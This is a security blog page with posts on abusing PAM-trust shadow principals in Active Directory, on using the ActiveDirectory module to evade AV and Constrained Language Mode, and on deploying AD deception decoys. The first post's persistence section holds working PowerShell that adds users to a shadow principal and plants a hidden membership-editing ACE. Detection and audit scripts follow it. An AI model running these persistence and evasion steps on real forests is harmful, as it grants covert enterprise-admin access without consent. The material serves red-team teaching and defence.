<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9lrnnkQXiXOQEpKf_ED3KJikQ1d7ae8t_i9L3L7PS9aPhI1VUf2-_YZ2bSZHv4qXnOxZfzMQq6UGYo_ejL65asWjPCqOn9m3FsBM86v7xpkmyBaYiW1b4Bid73WGBT4G2SQGCKPSxrOI/s1600/EA_PS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="425" data-original-width="826" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9lrnnkQXiXOQEpKf_ED3KJikQ1d7ae8t_i9L3L7PS9aPhI1VUf2-_YZ2bSZHv4qXnOxZfzMQq6UGYo_ejL65asWjPCqOn9m3FsBM86v7xpkmyBaYiW1b4Bid73WGBT4G2SQGCKPSxrOI/s400/EA_PS.png" width="400" /></a></div>
This is very interesting! We crossed the forest security boundary with ease :) Remember that we need not have group membership or ACL on the user forest.<br />
<br />
With the privileges obtained through the shadow principal above, we can access the user forest using RDP (explicit credentials of the bastion user are required), WMI, PowerShell Remoting etc. Please note that if Kerberos AES encryption is not enabled for the PAM trust, we need to add the machines of the existing forest to WSMan TrustedHosts and use the '-Authentication Negotiate' option with the PowerShell remoting cmdlets.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin6jmo9P4NKY7g6N6rej6vRa388THkRwrdpKxb5iY_XWlLR2AnteGc8N5AMQHMuainLPXfse0Z6-OOqK_icLrbkyflT135hc53Io6UeUV1rb9f5hTFSaSWHvr2C0JBs-H1glVGQ1YZPUU/s1600/PS-DC.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="755" data-original-width="1286" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin6jmo9P4NKY7g6N6rej6vRa388THkRwrdpKxb5iY_XWlLR2AnteGc8N5AMQHMuainLPXfse0Z6-OOqK_icLrbkyflT135hc53Io6UeUV1rb9f5hTFSaSWHvr2C0JBs-H1glVGQ1YZPUU/s400/PS-DC.png" width="400" /></a></div>
UPDATE (23/04/2019): Please note that we can also abuse the PAM trust with SIDHistory injection using mimikatz. I left it out because using a shadow principal looks more normal in the user forest than SIDHistory injection. But since <a href="https://twitter.com/dottor_morte">Riccardo</a> pointed out that it will still be useful, please take note of it!<br />
<br />
<b>Persistence</b><br />
<br />
We can also use this for persistence. Please note that the persistence is for the privileges on the user/production forest and not for the bastion forest itself.<br />
<br />
Once we have compromised the bastion forest, there are multiple ways we can use:<br />
<br />
1. We can add a user to an existing shadow security principal.<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">Set-ADObject -Identity "CN=psforest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=defensiveps,DC=local" -Add @{'member'="CN=lowpriv user,CN=Users,DC=defensiveps,DC=local"} -Verbose
</textarea></pre>
<br />
Please note that in this case, if someone looks at the details of the 'lowpriv user' account, it would appear to be a member of the psforest-ShadowEnterpriseAdmin 'group'. <br />
<br />
2. Better, we can modify the ACL of the shadow principal object. We could give a user we control Full Control over the shadow principal object, but the fun is always with <a href="https://www.labofapenetrationtester.com/2018/04/dcshadow.html">minimal permissions</a>. With only Read Members and Write Members permissions on the shadow principal object, we can add and remove principals at will. Take a look at the below screenshot:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc9Xd2VZxje5kVUS04KbjNo2sp8TWYwqQagcBOgmPYlJPEUCdyalrg0MrPk98R0rsv1jl7Ske0UG720Uo_ahflTxLLZgzT4iWlZnL9acqMPFSmvtXfaIb8HV81XH2RePG_tDbhEYjiGOY/s1600/ACL_Persistence.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1600" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc9Xd2VZxje5kVUS04KbjNo2sp8TWYwqQagcBOgmPYlJPEUCdyalrg0MrPk98R0rsv1jl7Ske0UG720Uo_ahflTxLLZgzT4iWlZnL9acqMPFSmvtXfaIb8HV81XH2RePG_tDbhEYjiGOY/s400/ACL_Persistence.png" width="400" /></a></div>
<br />
Now, we can add or remove users at will with the privileges of 'reportdbadmin' user. On top of that, by-default there are no logs for any changes to the ACL or 'membership' of a shadow principal :)<br />
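The screenshot shows the ACE being set through the GUI. As an added example (not part of the original post), the PowerShell below plants the same minimal-rights ACE: ReadProperty and WriteProperty scoped to the 'member' attribute only, granted to the 'reportdbadmin' account from the lab on the shadow principal DN used earlier. It assumes the ActiveDirectory module is loaded (for the AD: drive) and that you currently hold rights to change the object's DACL; the GUID is the schemaIDGUID of the member attribute.

```powershell
# Added example: grant a controlled bastion-forest account Read/Write on 'member' of a
# shadow principal and nothing else, then verify the ACE.
Import-Module ActiveDirectory

$shadowDN = 'CN=psforest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=defensiveps,DC=local'
$account  = Get-ADUser -Identity reportdbadmin
$memberAttributeGuid = [guid]'bf9679c0-0de6-11d0-a285-00aa003049e2'   # schemaIDGUID of the 'member' attribute

$acl    = Get-Acl -Path "AD:\$shadowDN"
$rights = [System.DirectoryServices.ActiveDirectoryRights]::ReadProperty -bor
          [System.DirectoryServices.ActiveDirectoryRights]::WriteProperty

# Object-specific ACE: the GUID restricts the rights to the 'member' attribute,
# so the account cannot change the SID mapping, the DACL or anything else on the object.
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
    $account.SID,
    $rights,
    [System.Security.AccessControl.AccessControlType]::Allow,
    $memberAttributeGuid)
$acl.AddAccessRule($ace)
Set-Acl -Path "AD:\$shadowDN" -AclObject $acl

# Verify: exactly one ACE for the account, scoped to the member attribute GUID.
(Get-Acl -Path "AD:\$shadowDN").Access |
    Where-Object { $_.IdentityReference -like '*reportdbadmin' } |
    Select-Object IdentityReference, ActiveDirectoryRights, ObjectType, AccessControlType

# With that ACE in place, reportdbadmin alone can add and remove members at will:
# Set-ADObject -Identity $shadowDN -Add @{member='CN=lowprivuser,CN=Users,DC=defensiveps,DC=local'} `
#     -Credential (Get-Credential defensiveps\reportdbadmin)
```

The verification output should list ActiveDirectoryRights as ReadProperty, WriteProperty with ObjectType equal to the member attribute GUID; an ACE with an all-zero ObjectType would mean the rights apply to every attribute, which is both more than needed and easier to spot.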
<br />
<h4>
Is PAM trust bad? Should I stop using a bastion forest? Why is Microsoft so evil? What is the meaning of life?</h4>
PAM trust is not bad, IF used wisely! You can use a bastion forest with a PAM trust, but please be careful. Learn from the setup we discussed just now. Do not use a regular forest (with users doing non-admin activities) as the bastion forest. As Willem pointed out in his article, when you use a PAM trust you extend the security boundary of the user forest to include the bastion forest. Treat the bastion forest as a special case and you will be fine. <br />
<br />
UPDATE: I forgot to link this: <a href="https://docs.microsoft.com/en-us/microsoft-identity-manager/pam/privileged-identity-management-for-active-directory-domain-services">Microsoft provides guidance on providing access to the bastion forest using Microsoft Identity Manager (MIM).</a><br />
<h4>
Detection</h4>
</div>
On the bastion forest, as already discussed, there are no logs by default for modification of the membership or ACL of shadow principals. <br />
<br />
On the existing/production forest, detection seems pretty easy at first: there will always be Special Logon (4672), Logon (4624) and Logoff (4634) events when a principal from the bastion forest accesses the existing forest, with the bastion forest as the account domain. The problem is spotting an anomaly, because the same events are generated by legitimate administration through the same shadow principals. Unless the adversary uses a new user or does something very noisy, it is difficult to detect her with only these entries; a baseline of which bastion accounts log on to which hosts is the practical starting point. <br />
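Since the bastion forest logs nothing by default, the cheapest fix is to put a SACL on the shadow principal container so that the two persistence techniques above (adding a member, changing the DACL) leave a trace. The following is an added example, not part of the original post or of any Microsoft guidance: it assumes the ActiveDirectory module is loaded, that you are an administrator in the bastion forest, and that the 'Directory Service Access' and 'Directory Service Changes' audit subcategories are enabled on the bastion DCs (the auditpol lines at the end, or the equivalent Group Policy setting). The member attribute GUID is its schemaIDGUID.

```powershell
# Added example: audit membership and permission changes on all shadow principals.
Import-Module ActiveDirectory

$container = 'CN=Shadow Principal Configuration,CN=Services,' + (Get-ADRootDSE).configurationNamingContext
$everyone  = [System.Security.Principal.SecurityIdentifier]'S-1-1-0'
$memberAttributeGuid = [guid]'bf9679c0-0de6-11d0-a285-00aa003049e2'   # schemaIDGUID of 'member'

$acl = Get-Acl -Path "AD:\$container" -Audit

# 1. Any successful write to 'member' on the container and on every object below it,
#    which covers shadow principals created later as well.
$auditMember = New-Object System.DirectoryServices.ActiveDirectoryAuditRule(
    $everyone,
    [System.DirectoryServices.ActiveDirectoryRights]::WriteProperty,
    [System.Security.AccessControl.AuditFlags]::Success,
    $memberAttributeGuid,
    [System.DirectoryServices.ActiveDirectorySecurityInheritance]::All)

# 2. Any successful DACL or owner change, which is how a minimal-rights ACE gets planted.
$auditDacl = New-Object System.DirectoryServices.ActiveDirectoryAuditRule(
    $everyone,
    ([System.DirectoryServices.ActiveDirectoryRights]::WriteDacl -bor
     [System.DirectoryServices.ActiveDirectoryRights]::WriteOwner),
    [System.Security.AccessControl.AuditFlags]::Success,
    [System.DirectoryServices.ActiveDirectorySecurityInheritance]::All)

$acl.AddAuditRule($auditMember)
$acl.AddAuditRule($auditDacl)
Set-Acl -Path "AD:\$container" -AclObject $acl

# Verify the SACL entries landed.
(Get-Acl -Path "AD:\$container" -Audit).Audit |
    Format-Table IdentityReference, ActiveDirectoryRights, ObjectType, InheritanceType -AutoSize

# Audit policy on the bastion DCs (run locally or set the same subcategories via GPO):
#   auditpol /set /subcategory:"Directory Service Access" /success:enable    -> 4662 on audited access
#   auditpol /set /subcategory:"Directory Service Changes" /success:enable   -> 5136 with the changed value
```

With this in place, adding 'lowpriv user' to a shadow principal produces a 4662 (and a 5136 carrying the new member DN) on the bastion DC, and a later read of the member attribute with that SACL still in place is a useful sign that nobody has quietly removed the auditing.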
<br />
I hope this post encourages everyone to have another look at their forest trusts. As always, please leave feedback :)<br />
<br /></div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com0tag:blogger.com,1999:blog-8135211063584500909.post-74014949772204983002018-10-31T22:40:00.002+05:302018-11-16T19:56:55.053+05:30Using ActiveDirectory module for Domain Enumeration from PowerShell Constrained Language Mode<div dir="ltr" style="text-align: left;" trbidi="on">
This is a quick post to make notes of something which I have been using and teaching for sometime.<br />
<br />
We can use Microsoft's PowerShell ActiveDirectory module without RSAT and without administrative privileges. I came to know about this from <a href="https://janikvonrotz.ch/2015/09/09/deploy-powershell-activedirectory-module-without-installing-the-remote-server-tools/">this blog post</a>.<br />
<br />
So, if you have access to a server which has the module installed (like a DC), copy Microsoft.ActiveDirectory.Management.dll from C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.ActiveDirectory.Management to your own machine and then use the Import-Module cmdlet to import the DLL:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\> Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll -Verbose
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlw8zH5s83_BHIVMQhyniImVyFIZOXMBYb9EnJiFw6UZOvPD0jUCdKzJm4I2-dnYeRipYRGfPcYJIS_W8syMogEpU1H42AD7AhFO2XIvDsJ99RAy7M9vrh0G3AisqIYM1J05coAzQrYrs/s1600/AD_Module.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="668" data-original-width="1600" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlw8zH5s83_BHIVMQhyniImVyFIZOXMBYb9EnJiFw6UZOvPD0jUCdKzJm4I2-dnYeRipYRGfPcYJIS_W8syMogEpU1H42AD7AhFO2XIvDsJ99RAy7M9vrh0G3AisqIYM1J05coAzQrYrs/s400/AD_Module.png" width="400" /></a></div>
Please note that if you run Get-Command -Module ActiveDirectory after importing only the DLL, it returns nothing. To get the cmdlets listed, copy the module directory as well from the server, from C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\. Then use Import-Module, first for the DLL and then for the module:<br />
<pre><textarea cols="70" readonly="readonly" rows="4" style="background-color: #012456; color: white;">PS C:\> Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll -Verbose
PS C:\> Import-Module C:\AD\Tools\ADModule\ActiveDirectory\ActiveDirectory.psd1
PS C:\> Get-Command -Module ActiveDirectory
</textarea></pre>
UPDATE (16-Nov-2018) - It is now possible to load the module from memory by using Import-ActiveDirectory.ps1. Thanks to a PR by @D1iv3: <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiCWcvpe0EXPpdJJWixiLbxX5brKF5KT_n0DyxKF33njpL9o4cjQFN-dMMDmYDIlgiA_mTRxaA5qH2t2BDjUt6LUfmi9zhJaVRMH2PzYjRTwzpnhf9QDtEl2d4Dl7lkKafu7zhyoygK8U/s1600/AD_Module_Array.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="776" data-original-width="1600" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiCWcvpe0EXPpdJJWixiLbxX5brKF5KT_n0DyxKF33njpL9o4cjQFN-dMMDmYDIlgiA_mTRxaA5qH2t2BDjUt6LUfmi9zhJaVRMH2PzYjRTwzpnhf9QDtEl2d4Dl7lkKafu7zhyoygK8U/s400/AD_Module_Array.png" width="400" /></a></div>
There are many benefits: very low chances of detection by AV, very wide coverage by cmdlets (I leave the usage of cmdlets for a later post :P), good filters for cmdlets, signed by Microsoft etc.<br />
<br />
I have uploaded a copy of module from Server 2016 on Github: <a href="https://github.com/samratashok/ADModule">https://github.com/samratashok/ADModule</a><br />
<br />
The biggest benefit is that this module works flawlessly in PowerShell Constrained Language Mode (CLM) :)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRUzpUxMmD-jlvxS9h99fyDBIfADPN2UCUaOT0Vng6PL5jU7FDKrgp1WGn5177DZ2gKmZEko_ITgvRmZlIINdeTYyy4AFJEhSW7kuxhunJrb7RhAaEtmrHbCxna5P1alD4-SgZu8nyO2E/s1600/AD_Module_CLM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="438" data-original-width="1600" height="108" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRUzpUxMmD-jlvxS9h99fyDBIfADPN2UCUaOT0Vng6PL5jU7FDKrgp1WGn5177DZ2gKmZEko_ITgvRmZlIINdeTYyy4AFJEhSW7kuxhunJrb7RhAaEtmrHbCxna5P1alD4-SgZu8nyO2E/s400/AD_Module_CLM.png" width="400" /></a></div>
That is all!</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com0tag:blogger.com,1999:blog-8135211063584500909.post-84081333898045955462018-10-16T23:13:00.000+05:302018-10-16T23:13:51.107+05:30Forging Trusts for Deception in Active Directory<div dir="ltr" style="text-align: left;" trbidi="on"><div style="text-align: justify;"></div><div style="text-align: justify;">Deception has always been of interest to me. As a student of military history, I have always been fascinated by its implementation in warfare and looked at deception as something which is effective and generally low cost!</div><div style="text-align: justify;">Couple of years back, I got involved in development and extensive testing (from red team perspective) of couple of enterprise deception solutions over a period of many months. In early 2018, during one of my Active Directory classes, a student asked and ultimately hired me (thank you!) for testing three Deception products they were evaluating. </div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">With these experiences I realized that most of the focus for deception in Active Directory (AD) has been on honeyuser/honeytokens/honeycredentials. Tools like <a href="https://github.com/secureworks/dcept">dcept</a> and others are popular for this technique. There is a dearth of free and open source deception solutions for AD if we want to utilize deception to detect an adversary during the domain enumeration phase of an attack. That is something which we are going to address soon.<br />
<br />
Also, to increase interest and community involvement, I gave a talk on 'Forging Trusts for Deception in Active Directory' at <a href="https://sched.co/FXIf">BruCON</a> couple of weeks back (October 2018). Slides and video are at the end of this post. </div><div style="text-align: justify;"></div><br />
<h4 style="text-align: justify;">What is Deception?</h4><br />
<div style="text-align: justify;">Deception is a psychology game. Red teams and adversaries have been using it for so long against unsuspecting users to trick them in opening malicious attachments or clicking on links. Once inside an AD environment, an adversary tries to use credentials of other users and pivot through other machines to mix with the existing logs and traffic.<br />
<br />
Blue teams utilize deception by providing the services, privileges or information an adversary is looking for. IMHO, blue teams have the upper hand when it comes to deception, both in terms of psychology and technical controls.<br />
<br />
<h4>The attacker psychology </h4>There is a psychological condition called <a href="https://en.wikipedia.org/wiki/Illusory_superiority">Illusory Superiority</a> which applies to most adversaries and red teams. They think of themselves as smarter and much more talented than the blue teams. Along with this, the tendency to go for the "lowest hanging fruit" and the urge to get DA privileges quickly make them a fruitful target for deception :)<br />
<br />
So, the idea is, defenders show the adversaries what they want to see. For example, a user whose password never expires or a Server 2003 computer.<br />
<br />
<h4>Desired properties of a decoy</h4>Taken directly from my slides, the desired properties of a decoy are:<br />
<ol><li>Should be desirable enough so that an attacker enumerates the object.</li>
<li>Should be easily configurable.</li>
<li>No configuration changes required on endpoints.</li>
<li>Should not be triggered for normal admin activity. </li>
</ol>Number 4 above is the hardest to achieve. If we are targeting enumeration, we must make the attacker activity or tools stand-out to avoid false positives.<br />
<br />
<h4>Deploying Deception</h4>So, how can we achieve the above desired properties with just the built-in tools in AD? We can use Group Policy to turn on AD access auditing, configure 'interesting' objects, and filter out false positives!<br />
<br />
The Group Policy setting required for AD Access is Windows Settings | Security Settings | Advanced Audit Policy Configuration | DS Access - Audit Directory Service Access <br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmm-lRbRq6OsM46ZjBgihre7Fs6zbsJWSrHtS-Eeln4SAM1ncSg0VvHdaclrySKZyvBMUTbkt7I_dPMFENPyi-Tz9MPxmAb6AFrAaVmUsXsX9t1YAkaUTdGrYx53TCRNkS4ZHJUKFM308/s1600/DS_Access_GP.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="AD Access Group Policy" border="0" data-original-height="631" data-original-width="840" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmm-lRbRq6OsM46ZjBgihre7Fs6zbsJWSrHtS-Eeln4SAM1ncSg0VvHdaclrySKZyvBMUTbkt7I_dPMFENPyi-Tz9MPxmAb6AFrAaVmUsXsX9t1YAkaUTdGrYx53TCRNkS4ZHJUKFM308/s400/DS_Access_GP.png" title="AD Access Group Policy" width="400" /></a></div>The above setting results in Security event 4662 whenever an audited AD object is accessed. The auditing itself is configured at the object level: we need to modify the SACL of the object and add the relevant ACEs.<br />
<br />
Let's have a look at the <a href="https://docs.microsoft.com/en-us/windows/desktop/api/securitybaseapi/nf-securitybaseapi-addauditaccessobjectace">AddAuditAccessObjectAce</a> function to understand ACE:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDaiLE2ZeUWZpxakHuCT06yF2KvdeKJvR23nuq5ejSQhx_l0HIOq-8oMF6gPHktC3r48bm5C4tQ65rPAk2VuxIfVi63lYLyBq8sNA1P6pLcDNqE-VaKwqSrS5KYGrXYnKctaqreoiThLo/s1600/ACE.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="583" data-original-width="1569" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDaiLE2ZeUWZpxakHuCT06yF2KvdeKJvR23nuq5ejSQhx_l0HIOq-8oMF6gPHktC3r48bm5C4tQ65rPAk2VuxIfVi63lYLyBq8sNA1P6pLcDNqE-VaKwqSrS5KYGrXYnKctaqreoiThLo/s640/ACE.png" width="540" /></a></div>So, as an example, we can audit every successful 'ReadProperty' access by 'Everyone' on a user object. This helps in detecting any enumeration against that user.<br />
<br />
<h4>Introducing Deploy-Deception </h4>These settings can be done using the GUI. But thanks to PowerShell and the ActiveDirectory module, they can be automated.<br />
<br />
To automate the setting up of decoy objects with interesting attributes and lesser-known properties to avoid false positives, I wrote <b>Deploy-Deception</b>. It is a PowerShell module which utilizes the ActiveDirectory module to deploy decoys easily and efficiently. You can find Deploy-Deception on GitHub here: <a href="https://github.com/samratashok/Deploy-Deception">https://github.com/samratashok/Deploy-Deception</a><br />
<br />
<br />
Let's have a look at setting up of different types of object decoys during different phases of an attack.<br />
<br />
<h4>Enumeration - Decoy User Objects</h4>User objects are the most interesting objects. Some user properties are of particular interest to an attacker:<br />
<ul><li>Password does not expire</li>
<li>Trusted for Delegation </li>
<li>Users with SPN</li>
<li>Password in description</li>
<li>Users who are members of high privilege groups</li>
<li>Users with ACL rights over other users, groups or containers </li>
</ul>We can use the Deploy-UserDeception function to create a decoy user. <br />
Let's create a decoy user 'usermanager' whose password never expires and for which a 4662 is logged whenever anyone reads any of its properties:<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">PS C:\> Import-Module C:\Deploy-Deception\Deploy-Deception.psd1
PS C:\> Create-DecoyUser -UserFirstName user -UserLastName manager -Password Pass@123 | Deploy-UserDeception -UserFlag PasswordNeverExpires -Verbose
</textarea></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8fzK1_L9a5Lm7Ew10a5z7y7lcE0PT3WOKe-Nbo5W6wglxsvYh95su_OQBXF7siYKW0RFeF312Zzbk4qqgYkSys-D2ku2XqV8k_2Xiddq_QBkd7hrmIdOTBkKGOVshD8vpt64vGTYjUBg/s1600/user_readall.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="382" data-original-width="1600" height="95" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8fzK1_L9a5Lm7Ew10a5z7y7lcE0PT3WOKe-Nbo5W6wglxsvYh95su_OQBXF7siYKW0RFeF312Zzbk4qqgYkSys-D2ku2XqV8k_2Xiddq_QBkd7hrmIdOTBkKGOVshD8vpt64vGTYjUBg/s400/user_readall.png" width="400" /></a></div><br />
Please note that an actual user object is created in the domain. Now, the above gets triggered very frequently, as we have enabled the default logging for whenever anyone reads any property of the user usermanager. It means a 4662 will be logged even if someone simply lists all the users in the domain. This means that this decoy will trigger logging for all possible usage (normal or otherwise) like<br />
<br />
net user /domain<br />
<br />
Get-WmiObject -Class Win32_UserAccount<br />
<br />
Get-ADUser -Filter * (MS ActiveDirectory module)<br />
<br />
Get-NetUser (PowerView)<br />
<br />
Find Users, Contacts and Groups GUI <br />
<br />
That does not look good, right? So we need to find ways to differentiate attacker enumeration from normal activity. There is something very interesting about attacker enumeration tools: they like to extract as much information for an object as possible (which makes sense, as you would not like to connect repeatedly to a domain controller). Now, this means that if we turn on auditing for an uncommon attribute, there is a large possibility (yes, possibility - share your false positives with me please :P) that only aggressive enumeration triggers the logging. There are many such attributes, have a look at the <a href="https://docs.microsoft.com/en-us/windows/desktop/adschema/attributes-all">List of All Attributes.</a> I liked one such attribute - <a href="https://docs.microsoft.com/en-us/windows/desktop/adschema/a-x500uniqueidentifier">x500uniqueIdentifier</a> (GUID d07da11f-8a3d-42b6-b0aa-76c962be719a)<br />
<br />
So, we now remove the ACE we added previously and add a new one which triggers logging only when x500uniqueIdentifier property is read:<br />
<pre><textarea cols="70" readonly="readonly" rows="4" style="background-color: #012456; color: white;">PS C:\> Deploy-UserDeception -DecoySamAccountName usermanager -RemoveAuditing $true -Verbose
PS C:\> Deploy-UserDeception -DecoySamAccountName usermanager -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose
</textarea></pre>This auditing is triggered only by tools like PowerView (or other tools like ADExplorer) which fetch all the attributes of an object. While not perfect, this is a huge improvement. <br />
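Deploy-Deception configures the auditing; the other half of the job is reading the resulting 4662 events and deciding which ones matter. As an added example (not part of the original post or of Deploy-Deception), the function below parses the message text of a 4662 event, checks whether the x500uniqueIdentifier GUID appears among the accessed properties, and suppresses accounts you know read every attribute legitimately. The event messages it is run on are constructed samples in the shape of a 4662 message (not real log data), and the allow-list entry is an assumed service account.

```powershell
# Added example: triage 4662 events for reads of the decoy attribute.
$DecoyAttributeGuid = 'd07da11f-8a3d-42b6-b0aa-76c962be719a'   # x500uniqueIdentifier
$KnownBulkReaders   = @('DEFENSIVEPS\svc-inventory')             # assumption: a tool allowed to read everything

function Test-DecoyAccess {
    param(
        [Parameter(Mandatory)][string]$Message,
        [string]$AttributeGuid = $DecoyAttributeGuid,
        [string[]]$AllowList = $KnownBulkReaders
    )
    $account = if ($Message -match 'Account Name:\s+(\S+)')   { $Matches[1] } else { '?' }
    $domain  = if ($Message -match 'Account Domain:\s+(\S+)') { $Matches[1] } else { '?' }
    $object  = if ($Message -match 'Object Name:\s+(.+)')     { $Matches[1].Trim() } else { '?' }
    # Every {GUID} in the message (property GUIDs and the object type GUID); only the decoy GUID matters.
    $guids = [regex]::Matches($Message, '\{([0-9a-fA-F-]{36})\}') | ForEach-Object { $_.Groups[1].Value.ToLower() }
    $who   = "$domain\$account"
    $hit   = $guids -contains $AttributeGuid.ToLower()
    [pscustomobject]@{
        Account            = $who
        Object             = $object
        ReadDecoyAttribute = $hit
        Suspicious         = $hit -and ($AllowList -notcontains $who)
    }
}

# Constructed sample in the shape of a 4662 message (not real log data).
function New-Sample4662 {
    param([string]$Account, [string]$Domain, [string]$ObjectName, [string[]]$PropertyGuids)
    $props = ($PropertyGuids | ForEach-Object { "        {$_}" }) -join "`n"
@"
An operation was performed on an object.

Subject :
    Security ID:        S-1-5-21-1111111111-2222222222-3333333333-1105
    Account Name:       $Account
    Account Domain:     $Domain
    Logon ID:           0x3E7A1

Object:
    Object Server:      DS
    Object Type:        %{bf967aba-0de6-11d0-a285-00aa003049e2}
    Object Name:        $ObjectName
    Handle ID:          0x0

Operation:
    Operation Type:     Object Access
    Accesses:           Read Property
    Access Mask:        0x10
    Properties:         Read Property
$props
"@
}

$decoyDN   = 'CN=user manager,CN=Users,DC=defensiveps,DC=local'
$otherGuid = '00000000-0000-0000-0000-000000000001'   # placeholder for any non-decoy attribute
$samples = @(
    New-Sample4662 -Account jdoe          -Domain DEFENSIVEPS -ObjectName $decoyDN -PropertyGuids $DecoyAttributeGuid, $otherGuid
    New-Sample4662 -Account svc-inventory -Domain DEFENSIVEPS -ObjectName $decoyDN -PropertyGuids $DecoyAttributeGuid
    New-Sample4662 -Account jdoe          -Domain DEFENSIVEPS -ObjectName $decoyDN -PropertyGuids $otherGuid
)
$samples | ForEach-Object { Test-DecoyAccess -Message $_ } | Format-Table -AutoSize

# Live use on a DC with the decoy SACL in place:
# Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4662} -MaxEvents 1000 |
#     ForEach-Object { Test-DecoyAccess -Message $_.Message } | Where-Object Suspicious
```

Of the three samples only the first is flagged: jdoe read the decoy attribute and is not on the allow list; svc-inventory read it but is allowed; the last read did not touch the decoy attribute at all. For production use, parse the event XML ($_.ToXml()) rather than the rendered message, since the message text depends on the DC's message resources and locale.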
<br />
If you have enough confidence that none of your monitoring or management tools read all the properties of a user object, auditing for properties like servicePrincipalName can also be set, which triggers logging only when the SPN (or all attributes) is read. The GUID below is that of the servicePrincipalName attribute. <br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\> Create-DecoyUser -UserFirstName user -UserLastName manager-spn -Password Pass@123 | Deploy-UserDeception -SPN 'MSSQLSvc/dc' -GUID f3a64788-5306-11d1-a9c5-0000f80367c1 -Verbose
</textarea></pre>Still too many logs? The below command logs a 4662 only when the DACL (or all attributes) of the decoy user object is read, since reading the security descriptor needs READ_CONTROL:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\> Create-DecoyUser -UserFirstName user -UserLastName manager-control -Password Pass@123 | Deploy-UserDeception -UserFlag AllowReversiblePasswordEncryption -Right ReadControl -Verbose
</textarea></pre><h4>Enumeration - Decoy Computer Objects</h4>We can also set up decoy computer objects. It is possible to create computer objects in the domain without having an actual computer mapped to that object. However, it is always advised to use actual computers or VMs for decoy computer objects to avoid identification of the decoys.<br />
<br />
Some computer object properties which are of interest to an adversary:<br />
<ul><li>Older Operating Systems</li>
<li>Interesting SPN</li>
<li>Delegation Settings</li>
<li>Membership of privileged groups</li>
</ul>Let's have a look at some deployments. We can use the Deploy-ComputerDeception function:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\> Create-DecoyComputer -ComputerName revert-web -Verbose | Deploy-ComputerDeception -PropertyFlag TrustedForDelegation -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose
</textarea></pre>The above command creates a decoy computer that has Unconstrained Delegation enabled, and a 4662 is logged whenever x500uniqueIdentifier or all the attributes of the computer are read.<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\> Deploy-ComputerDeception -DecoyComputerName comp1 -PropertyFlag TrustedForDelegation -Right ReadControl -Verbose
</textarea></pre>The above command uses an existing computer object and enables Unconstrained Delegation on it. Logging is triggered whenever the DACL or all the attributes of the computer are read.<br />
<br />
We can also use <a href="https://www.dcshadow.com/">DCShadow</a> to modify a computer object so that it appears to be a DC. I briefly touched on this <a href="https://www.labofapenetrationtester.com/2018/04/dcshadow.html">here</a>. More on this particular topic some other day.<br />
